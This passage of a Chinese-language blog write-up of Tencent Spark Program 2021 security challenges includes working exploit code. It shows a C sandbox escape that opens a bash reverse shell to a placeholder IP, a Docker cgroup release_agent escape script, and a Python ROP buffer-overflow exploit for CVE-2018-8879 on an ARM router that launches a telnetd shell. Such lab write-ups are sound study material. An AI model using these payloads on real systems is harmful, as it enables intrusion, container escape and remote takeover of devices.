class="number">0755</span>);</span><br><span class="line">  syscall((<span class="type">unsigned</span> <span class="type">int</span>)<span class="number">1073741985</span>, (<span class="type">unsigned</span> <span class="type">long</span>)<span class="string">&quot;abc&quot;</span>); <span class="comment">// chroot</span></span><br><span class="line">  <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;<span class="number">20</span>;++i)chdir(<span class="string">&quot;..&quot;</span>);</span><br><span class="line">  syscall((<span class="type">unsigned</span> <span class="type">int</span>)<span class="number">1073741985</span>, (<span class="type">unsigned</span> <span class="type">long</span>)<span class="string">&quot;.&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;chroot\n&quot;</span>);</span><br><span class="line">        <span class="comment">// syscall((unsigned)1073741985, (unsigned)&quot;.foo&quot;);</span></span><br><span class="line">        change_root();</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;success\n&quot;</span>);</span><br><span class="line">        <span class="type">size_t</span> pagesize=getpagesize();</span><br><span class="line">        <span class="type">void</span> *region = mmap((<span class="type">void</span>*)<span class="number">0</span>,pagesize,PROT_READ|PROT_WRITE|PROT_EXEC,<span class="number">32</span>|MAP_PRIVATE|<span class="number">64</span>,<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> comm[]= <span class="string">&quot;/bin/rm\0-rf\0/lib64/scf.so&quot;</span>;</span><br><span class="line">        <span class="built_in">memcpy</span>(region, comm, <span class="keyword">sizeof</span> comm);</span><br><span class="line">        <span class="type">const</span> <span class="type">unsigned</span> ptr[] = &#123;region, region+<span class="number">8</span>, region+<span class="number">12</span>, <span class="literal">NULL</span>&#125;;</span><br><span class="line">        <span class="built_in">memcpy</span>(region + <span class="number">64</span>, ptr, <span class="keyword">sizeof</span> ptr);</span><br><span class="line">        <span class="type">const</span> <span class="type">unsigned</span>* ptr1 = region + <span class="number">64</span>;</span><br><span class="line">        syscall((<span class="type">unsigned</span> <span class="type">int</span>)<span class="number">1073742344</span>, (<span class="type">unsigned</span> <span class="type">long</span>)ptr1[<span class="number">0</span>], (<span class="type">unsigned</span> <span class="type">long</span>)ptr1, <span class="number">0</span>); <span class="comment">// execve</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">---------------------------------------------</span><br><span class="line"><span class="comment">// second time code</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stddef.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ptrace.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/user.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/prctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/seccomp.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/filter.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/audit.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">change_root</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  chdir(<span class="string">&quot;/&quot;</span>);</span><br><span class="line">  mkdir(<span class="string">&quot;abc&quot;</span>, <span class="number">0755</span>);</span><br><span class="line">  syscall((<span class="type">unsigned</span> <span class="type">int</span>)<span class="number">1073741985</span>, (<span class="type">unsigned</span> <span class="type">long</span>)<span class="string">&quot;abc&quot;</span>); <span class="comment">// chroot</span></span><br><span class="line">  <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;<span class="number">20</span>;++i)chdir(<span class="string">&quot;..&quot;</span>);</span><br><span class="line">  syscall((<span class="type">unsigned</span> <span class="type">int</span>)<span class="number">1073741985</span>, (<span class="type">unsigned</span> <span class="type">long</span>)<span class="string">&quot;.&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  change_root();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Running ps with system\n&quot;</span>);</span><br><span class="line">    system(<span class="string">&quot;/bin/bash -c \&quot;/bin/bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1\&quot;&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;ps Done\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在提交窗口依次运行payload代码即可获取反弹shell。ps：可能由于demo中对于代码执行时间有所限制，直接利用EXP可能会造成反弹shell时间非常短（只有不到1s），可以通过自定义题目代码执行时间等等方法去绕过，这里不过多赘述。</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819130843286.png" data-caption="image-20210819130843286"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210819130843286.png" alt="image-20210819130843286"></a></p>
<h2 id="Docker逃逸"><a href="#Docker逃逸" class="headerlink" title="Docker逃逸"></a>Docker逃逸</h2><p>挑战背景：即使我们通过前两个挑战得到了反弹shell，但是通过观察主机名我们可以发现实际上这个shell是docker内部的。我们还需要逃逸出docker才能得到主机的shell。</p>
<p>漏洞分析：因为评测机需要进行一些Linux内核的cgroup优化评测过程（例如直接限制运行时间和内存），因此允许容器内的root拥有外部物理机的root权限，而此前在容器内的root用户只有外部物理机普通用户的权限。所以攻击思路为：利用mount命令在Linux系统盘下挂载一个新建的文件夹使容器内可以直接访问主机文件，创建 <code>release_agent</code> 文件并通过创建子cgroup得以快速杀死cgroup内所有进程并触发 <code>release_agent</code> ，把攻击代码写入 <code>release_agent</code> 文件内即可。</p>
<blockquote>
<p>  使用特权模式启动容器后（docker run –privileged），Docker容器被允许可以访问主机上的所有设备、可以获取大量设备文件的访问权限、并可以执行mount命令进行挂载。</p>
<p>  当控制使用特权模式的容器时，Docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部，获取对整个宿主机的文件读写权限，此外还可以通过写入计划任务等方式在宿主机执行命令。</p>
</blockquote>
<blockquote>
<p>  cgroups(Control Groups) 是 linux 内核提供的一种机制，<strong>这种机制可以根据需求把一系列系统任务及其子任务整合(或分隔)到按资源划分等级的不同组内，从而为系统资源管理提供一个统一的框架</strong>。简单说，cgroups 可以限制、记录任务组所使用的物理资源。本质上来说，cgroups 是内核附加在程序上的一系列钩子(hook)，通过程序运行时对资源的调度触发相应的钩子以达到资源追踪和限制的目的。</p>
</blockquote>
<p><code>payload.sh</code> EXP文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#！/bin/bash</span></span><br><span class="line"><span class="built_in">mkdir</span> -p /mnt/hola</span><br><span class="line">mount /dev/vda2 /mnt/hola</span><br><span class="line"></span><br><span class="line"><span class="built_in">mkdir</span> /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp &amp;&amp; <span class="built_in">mkdir</span> /tmp/cgrp/x</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /tmp/cgrp/x/notify_on_release</span><br><span class="line">host_path=`sed -n <span class="string">&#x27;s/.*\perdir=\([^,]*\).*/\1/p&#x27;</span> /etc/mtab`</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$host_path</span>/cmd&quot;</span> &gt; /tmp/cgrp/release_agent</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;#!/bin/bash&#x27;</span> &gt; /cmd</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1&quot;</span> &gt;&gt; /cmd</span><br><span class="line"><span class="built_in">chmod</span> a+x /cmd</span><br><span class="line"></span><br><span class="line">sh -c <span class="string">&quot;echo \$\$ &gt; /tmp/cgrp/x/cgroup.procs&quot;</span></span><br></pre></td></tr></table></figure>

<p>反弹shell：</p>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813182738384.png" data-caption="image-20210813182738384"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/image-20210813182738384.png" alt="image-20210813182738384"></a></p>
<h2 id="安卓Chrome漏洞导致文件泄露"><a href="#安卓Chrome漏洞导致文件泄露" class="headerlink" title="安卓Chrome漏洞导致文件泄露"></a>安卓Chrome漏洞导致文件泄露</h2><p>暂未完成任务</p>
<h2 id="路由器未授权用户Getshell"><a href="#路由器未授权用户Getshell" class="headerlink" title="路由器未授权用户Getshell"></a>路由器未授权用户Getshell</h2><p>挑战背景：导师怕我们题目做的太快作为补充题目（bushi。路由器作为家庭网络的中枢，在网络安全中有至关重要的作用。若路由器被攻击者侵入，家庭网络上的所有流量都将暴露给攻击者。懒惰的开发者家里现在使用了一个旧版本固件的路由器，已知暴露在<a target="_blank" rel="noopener" href="https://nvd.nist.gov/vuln/detail/CVE-2018-8879">CVE-2018-8879缓冲区溢出漏洞</a>的风险下，你能试着拿到他的高端路由器吗？（物理意义上以及安全意义上）</p>
<p>漏洞分析：根据文章，通过遍历web-server中所有文件查看是否能够找到未授权即可访问的页面，发现在 <code>blocking.asp</code> 页面中显示的信息都是通过URL参数传参得到的，<code>mac</code>，<code>flag</code> 和 <code>cat_id</code>。当通过往参数塞大量A时，通过系统日志，HTTPd 保护进程崩溃了。至此判断为非常经典的缓冲区溢出漏洞。但是只通过这个方式没有办法监听栈地址；并且无法跳转到shell code中；没有ROP chain，因为需要 <code>null-byte</code> 。（注意，目前为止的利用仅仅在URL参数中）通过查看栈内其他数据，发现在 HTTP 请求头中每个参数的结尾处有 <code>null-byte</code> 的存在，可以作为ROP chain使用。</p>
<blockquote>
<p>  ROP (Return Oriented Programming) is related to buffer overflows, in that it requires a buffer to overflow. The difference is that ROP is used to bypass certain protection measures that prevent normal buffer overflows. It turns out that a lot of the time, memory in programs is marked as non-executable. This means that we can’t just put shellcode on the stack and have it execute, this is where ROP comes in. <strong>Recall the stack.</strong> </p>
  <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[ return address ] &lt;-- this is the address of the next function to call, we want to overwrite this</span><br><span class="line">[  eip (address) ] &lt;-- this takes up memory</span><br><span class="line">[ stack variable ] &lt;-- this also takes up memory</span><br><span class="line">[    buffer[15]  ] &lt;-- this is the 16th character of our input string</span><br><span class="line">[      ...       ]</span><br><span class="line">[    buffer[0]   ] &lt;-- our input starts here</span><br></pre></td></tr></table></figure>
</blockquote>
<p>路由器为ARM架构，因此需提前了解ARM寄存器和其函数调用约定。</p>
<blockquote>
<p>  先看一下 arm 下的函数调用约定，函数的第 1 ～ 4 个参数分别保存在 <strong>r0 ～ r3</strong> 寄存器中， 剩下的参数从右向左依次入栈， 被调用者实现栈平衡，函数的返回值保存在 <strong>r0</strong> 中</p>
<p>  除此之外，arm 的 <strong>b&#x2F;bl</strong> 等指令实现跳转; <strong>pc</strong> 寄存器相当于 x86 的 eip，保存下一条指令的地址，也是我们要控制的目标</p>
</blockquote>
<p><a data-fancybox="gallery" data-src="/2021/08/19/Tencent-Spark-Program-2021/assets/ARM_Calling_Convention.png" data-caption="img"><img src="/2021/08/19/Tencent-Spark-Program-2021/assets/ARM_Calling_Convention.png" alt="img"></a></p>
<p>需要执行恶意代码，首先我们需要控制的就是PC或b&#x2F;bl，能够有机会让我们控制的地方我们称之为 <code>gadget</code> 。寻找 gadget 的方式有很多，比如利用ROPgadget，ropper，甚至直接IDA逆向后搜索关键词。找到了合适的gadget，通过栈溢出，我们把URL参数flag溢出到存放请求头参数的区域，再通过请求头中参数使PC的地址成为任意我们所控制的地址。下一步便是寻找和系统调用相关的程序地址，比如system函数。把PC地址指向system函数的地址，再传参恶意代码，整个攻击过程就结束啦。</p>
<p><code>payload.py</code> EXP文件：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="keyword">import</span> struct, urllib3</span><br><span class="line"><span class="comment"># 00019360 add sp, sp #0x800 pop &#123;r4-r7,PC&#125;</span></span><br><span class="line"><span class="comment"># 0002B3B4 mov r0, sp; mov r5, sp; bl system</span></span><br><span class="line">cmd = <span class="string">&#x27;telnetd -p 8888 -b 0.0.0.0:8888 -l /bin/sh&#x27;</span></span><br><span class="line">cmd = <span class="string">&#x27;;&#x27;</span> + cmd + <span class="string">&#x27;;&#x27;</span></span><br><span class="line">align = <span class="string">&quot;A&quot;</span> * <span class="number">208</span></span><br><span class="line">payload = <span class="string">&quot;A&quot;</span> * <span class="number">532</span></span><br><span class="line">payload += struct.pack(<span class="string">&quot;&lt;I&quot;</span>, <span class="number">0x00019360</span>)</span><br><span class="line">url = <span class="string">&quot;http://192.168.50.1/blocking.asp&quot;</span></span><br><span class="line">params = &#123;<span class="string">&#x27;flag&#x27;</span>: payload&#125;</span><br><span class="line">headers = &#123;<span class="string">&#x27;Accept&#x27;</span>:(<span class="string">&#x27;text/html,application/xhtml+xml,application/xml;&#x27;</span><span class="string">&#x27;q=0.9,image/webp,*/*;q=0.8&#x27;</span>),</span><br><span class="line">        <span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;en-US,en;q=0.5&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Cookie&#x27;</span>: align + <span class="string">&quot;VVVV&quot;</span> + <span class="string">&quot;WWWW&quot;</span> + <span class="string">&quot;XXXX&quot;</span> + <span class="string">&quot;YYYY&quot;</span> + struct.pack(<span class="string">&quot;&lt;I&quot;</span>, <span class="number">0x0002B3B4</span>),</span><br><span class="line">        <span class="string">&#x27;User-Agent&#x27;</span>: cmd + <span class="string">&#x27;clickedItem_tab=0&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Connection&#x27;</span>: <span class="string">&#x27;close&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Upgrade-Insecure-Requests&#x27;</span>: <span class="string">&#x27;1&#x27;</span>&#125;</span><br><span class="line">http = urllib3.PoolManager()</span><br><span class="line">r = http.request(<span class="string">&#x27;GET&#x27;</span>, url, fields=params,headers=headers,)</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/ThomasonZhao">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Vijos-OJ%E8%AF%84%E6%B5%8B%E6%9C%BA%E4%B9%8Byaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.</span> <span class="toc-text">Vijos OJ评测机之yaml反序列化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vijos-OJ%E8%AF%84%E6%B5%8B%E6%9C%BA%E4%B9%8B%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="toc-number">2.</span> <span class="toc-text">Vijos OJ评测机之沙箱逃逸</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Docker%E9%80%83%E9%80%B8"><span class="toc-number">3.</span> <span class="toc-text">Docker逃逸</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%89%E5%8D%93Chrome%E6%BC%8F%E6%B4%9E%E5%AF%BC%E8%87%B4%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2"><span class="toc-number">4.</span> <span class="toc-text">安卓Chrome漏洞导致文件泄露</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83%E7%94%A8%E6%88%B7Getshell"><span class="toc-number">5.</span> <span class="toc-text">路由器未授权用户Getshell</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&text=Tencent Spark Program 2021"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&is_video=false&description=Tencent Spark Program 2021"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Tencent Spark Program 2021&body=Check out this article: https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&title=Tencent Spark Program 2021"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&name=Tencent Spark Program 2021&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://thomasonzhao.github.io/2021/08/19/Tencent-Spark-Program-2021/&t=Tencent Spark Program 2021"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2022
    Thomason Zhao
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ThomasonZhao">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<!-- FancyBox -->

<script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>

</body>
</html>
